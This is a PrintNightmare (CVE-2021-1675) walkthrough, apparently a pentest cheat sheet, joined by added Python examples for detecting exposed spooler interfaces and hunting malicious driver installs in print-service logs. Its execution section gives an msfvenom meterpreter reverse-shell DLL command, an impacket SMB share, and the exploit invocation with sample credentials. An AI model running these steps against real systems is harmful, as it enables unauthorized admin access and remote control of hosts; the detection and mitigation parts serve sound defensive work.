Print Nightmare (CVE-2021-1675)

Requirements: User

Intro

This is a privilege escalation and RCE (Remote Command Execution) vulnerability in the Windows Print Spooler service. Because the spooler runs with administrative privileges, exploiting it gives us admin privileges. It can also be exploited remotely, using impacket and other useful tools.

Requirements

  • Have access as a user on the machine.

Execution

rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol
  • If the output lists these two protocols as shown here, the target is vulnerable.
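The rpcdump check above is a one-host, eyeball-the-output step. The following added example (mine, not part of the original page or of impacket) turns it into something a defender can run over saved rpcdump.py output for a whole subnet: it parses the Protocol/UUID/Bindings records, matches the MS-RPRN and MS-PAR interface UUIDs from their specifications, and reports only interfaces reachable over ncacn_ip_tcp, since ncalrpc bindings are local-only. The sample dump is constructed to mimic rpcdump.py's record layout (the unrelated first record uses a made-up UUID); the function names are my own.

```python
"""Flag hosts whose RPC endpoint map exposes the print spooler (MS-RPRN / MS-PAR).

Added example, not part of the original page or of impacket. Parses text in
the record layout produced by rpcdump.py (Protocol / Provider / UUID /
Bindings blocks separated by blank lines). SAMPLE_DUMP is constructed to
mimic that layout; a real dump may differ slightly in spacing.
"""
import re

# Interface UUIDs from the MS-RPRN and MS-PAR protocol specifications.
SPOOLER_INTERFACES = {
    "12345678-1234-ABCD-EF00-0123456789AB": "MS-RPRN",
    "76F03F96-CDFD-44FC-A22C-64950A001209": "MS-PAR",
}

# Constructed sample: one unrelated interface (made-up UUID) that must be
# ignored, then both spooler interfaces exposed over TCP on the same port.
SAMPLE_DUMP = """\
Protocol: N/A
Provider: N/A
UUID    : AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE v1.0
Bindings:
          ncacn_ip_tcp:192.168.1.10[49664]

Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:192.168.1.10[49669]
          ncalrpc:[LRPC-4f1d6a5a2c3b4d5e6f]

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Provider: spoolsv.exe
UUID    : 76F03F96-CDFD-44FC-A22C-64950A001209 v1.0
Bindings:
          ncacn_ip_tcp:192.168.1.10[49669]
          ncalrpc:[LRPC-4f1d6a5a2c3b4d5e6f]
"""

UUID_RE = re.compile(r"^UUID\s*:\s*([0-9A-Fa-f-]{36})", re.MULTILINE)
TCP_RE = re.compile(r"ncacn_ip_tcp:([^\[\s]+)\[(\d+)\]")


def spooler_endpoints(dump_text):
    """Return {interface_name: sorted ['ip:port', ...]} for spooler interfaces
    that are bound to a TCP endpoint. Local-only ncalrpc bindings are ignored."""
    found = {}
    for record in re.split(r"\n\s*\n", dump_text.strip()):
        match = UUID_RE.search(record)
        if not match:
            continue
        name = SPOOLER_INTERFACES.get(match.group(1).upper())
        if name is None:
            continue  # not a spooler interface
        endpoints = {f"{ip}:{port}" for ip, port in TCP_RE.findall(record)}
        if endpoints:
            found[name] = sorted(endpoints)
    return found


def spooler_exposed(dump_text):
    """True if MS-RPRN or MS-PAR is reachable over TCP in this dump."""
    return bool(spooler_endpoints(dump_text))


if __name__ == "__main__":
    for name, eps in spooler_endpoints(SAMPLE_DUMP).items():
        print(f"{name} reachable at {', '.join(eps)}")
```

A positive result means the spooler's RPC interfaces are reachable from the network, which is the precondition the rest of this page relies on; it does not by itself say whether the host carries the patch. Microsoft's mitigations for hosts that turn up in this list are to stop and disable the Spooler service where printing is not needed, or, where it is, to set RestrictDriverInstallationToAdministrators to 1 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint (KB5005010).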

Creating a malicious .dll

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f dll > malicious.dll

Now start listening with a meterpreter session.

Start an SMB Server

smbserver.py share `pwd` -smb2support

Using the exploit

./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\share\malicious.dll'
  • The UNC path must point at the share started above (share name share, on the attacker host 192.168.1.215) and at the DLL generated with msfvenom (malicious.dll).
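The driver-install step above leaves a distinctive trail in the Microsoft-Windows-PrintService/Operational channel: Event 316 ("Printer driver ... was added or updated. Files:- ...") listing a DLL that is not part of a normal driver package, often followed by Event 808 ("The print spooler failed to load a plug-in module ...") when the payload DLL does not initialise cleanly. The following added example (mine, not part of the original page or of the exploit script) runs that detection over exported event records. The message templates are those of the two event definitions; the records in SAMPLE_EVENTS are constructed, not captured logs, and the function names and the expected-file list are my own assumptions to tune per environment.

```python
"""Hunt for PrintNightmare-style driver installs in PrintService/Operational events.

Added example, not part of the original page or of the exploit script it uses.
Input is a list of {"event_id": int, "message": str} records as you would get
from an export of Microsoft-Windows-PrintService/Operational. SAMPLE_EVENTS
is constructed; the message wording follows the Event 316 / 808 templates.
"""
import re
from dataclasses import dataclass

# Files a legitimate Version-3 UNIDRV-based driver install normally lists.
# Extend for your own driver estate. kernelbase.dll is deliberately absent:
# it is not a printer driver file, so a driver install listing it is odd.
EXPECTED_DRIVER_FILES = {"unidrv.dll", "unidrvui.dll", "unires.dll",
                         "stdnames.gpd", "ntprint.inf"}

FILES_RE = re.compile(r"Files:-\s*(.*?)(?:\.\s*No user action|\s*$)", re.DOTALL)
DRIVER_RE = re.compile(r"^Printer driver (.+?) for Windows", re.IGNORECASE)

# Constructed sample records: a benign driver install, a suspicious one
# (driver name and file names made up), a plug-in load failure, and an
# unrelated print-job event that must not be flagged.
SAMPLE_EVENTS = [
    {"event_id": 316, "message": "Printer driver HP Universal Printing PCL 6 for Windows x64 Version-3 was added or updated. Files:- UNIDRV.DLL, UNIDRVUI.DLL, UNIRES.DLL, STDNAMES.GPD. No user action is required."},
    {"event_id": 316, "message": "Printer driver 1234 for Windows x64 Version-3 was added or updated. Files:- UNIDRV.DLL, kernelbase.dll, malicious.dll. No user action is required."},
    {"event_id": 808, "message": "The print spooler failed to load a plug-in module C:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\malicious.dll, error code 0x45A. See the event user data for context information."},
    {"event_id": 307, "message": "Document 5, report.txt owned by alice on \\\\WS01 was printed on Printer1 through port LPT1:. Size in bytes: 1024. Pages printed: 1. No user action is required."},
]


@dataclass
class Finding:
    event_id: int
    reason: str
    detail: str


def driver_files(message):
    """Extract the comma-separated file list from an Event 316 message."""
    match = FILES_RE.search(message)
    if not match:
        return []
    return [f.strip() for f in match.group(1).split(",") if f.strip()]


def suspicious_files(message, expected=EXPECTED_DRIVER_FILES):
    """Files in a 316 message that are not part of the expected driver set."""
    return [f for f in driver_files(message) if f.lower() not in expected]


def hunt(events, expected=EXPECTED_DRIVER_FILES):
    """Return one Finding per driver install with unexpected files (316) and
    per plug-in load failure (808); everything else is ignored."""
    findings = []
    for event in events:
        eid, msg = event["event_id"], event["message"]
        if eid == 316:
            odd = suspicious_files(msg, expected)
            if odd:
                name = DRIVER_RE.search(msg)
                driver = name.group(1) if name else "?"
                findings.append(Finding(316, "unexpected file in driver install",
                                        f"driver={driver} files={odd}"))
        elif eid == 808:
            findings.append(Finding(808, "spooler failed to load a plug-in module", msg))
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(f"[{finding.event_id}] {finding.reason}: {finding.detail}")
```

The Operational channel is disabled by default, so this only pays off on hosts where it has been switched on (wevtutil sl Microsoft-Windows-PrintService/Operational /e:true) and forwarded. A 316 with an unexpected DLL followed within seconds by an 808 on the same host is the pairing to page on; a lone 316 for a driver your print team actually rolled out is the false positive the expected-file list is there to suppress.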
